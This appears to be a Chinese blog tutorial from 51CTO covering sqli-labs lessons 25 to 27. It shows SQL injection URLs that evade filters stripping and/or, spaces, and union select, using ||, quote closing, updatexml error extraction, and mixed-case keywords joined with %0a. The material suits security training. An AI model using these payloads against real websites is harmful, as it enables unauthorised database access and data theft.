20、绕过去除and、or、union select、空格的sql注入

原创

web安全工具库 2022-12-26 18:25:41 博主文章分类：小课堂 ©著作权

文章标签 sqli-labs 特殊字符绕过 sql注入 sql 文章分类 运维

©著作权归作者所有：来自51CTO博客作者web安全工具库的原创作品，请联系作者获取转载授权，否则将追究法律责任

环境sqli-labs

less 25

1、输入特殊字符，报错

http://192.168.1.121/sqli/Less-25/?id=1 20、绕过去除and、or、union select、空格的sql注入_特殊字符

2、单引号闭合

20、绕过去除and、or、union select、空格的sql注入_特殊字符_02

3、输入and、or都会被过滤，报错，输入||正常，所以可以判断是大小写过滤

http://192.168.1.121/sqli/Less-25/?id=1’ and 1=1 --+

http://192.168.1.121/sqli/Less-25/?id=1’ or1=1 --+

20、绕过去除and、or、union select、空格的sql注入_绕过_03

http://192.168.1.121/sqli/Less-25/?id=1’ || 1=1 --+

20、绕过去除and、or、union select、空格的sql注入_绕过_04

less 26

一、输入特殊字符，看报错信息

http://192.168.1.121/sqli/Less-26/?id=1’ 20、绕过去除and、or、union select、空格的sql注入_sql_05

二、闭合语句没有效果，屏蔽了-，空格，or等等

http://192.168.1.121/sqli/Less-26/?id=1’ --+

三、重新构造闭合语句

http://192.168.1.121/sqli/Less-26/?id=1’ ||‘a’='a

20、绕过去除and、or、union select、空格的sql注入_绕过_06

这样就绕过了去空格

四、获取数据库名称

http://192.168.1.121/sqli/Less-26/?id=1’||updatexml(1,concat(’$’,(database())),0)||‘1’=‘1

20、绕过去除and、or、union select、空格的sql注入_sqli-labs_07

less 27

一、输入特殊字符，报错

http://192.168.1.121/sqli/Less-27/?id=1’ 20、绕过去除and、or、union select、空格的sql注入_sql_08 二、由于过滤了特殊符号，构造如下闭合语句

http://192.168.1.121/sqli/Less-27/?id=1’ ||'1

20、绕过去除and、or、union select、空格的sql注入_sql注入_09

三、通过union查询

http://192.168.1.121/sqli/Less-27/?id=1’ union select 1,2,3 ||'1

20、绕过去除and、or、union select、空格的sql注入_sqli-labs_10

union、select屏蔽了，空格也屏蔽了四、union.select大小写替换一下，空格用/%0a/替换

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,2,3%20||'1

20、绕过去除and、or、union select、空格的sql注入_绕过_11

五、获取数据库名称

http://192.168.1.121/sqli/Less-27/?id=0’/%0a/uniOn/%0a/seLect/%0a/1,database(),3||'1

20、绕过去除and、or、union select、空格的sql注入_sql注入_12

禁止非法，后果自负

欢迎关注公众号：web安全工具库

20、绕过去除and、or、union select、空格的sql注入_sql_13

上一篇：21、sqlmap参数详解

下一篇：19、绕过去除注释符(Get)

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯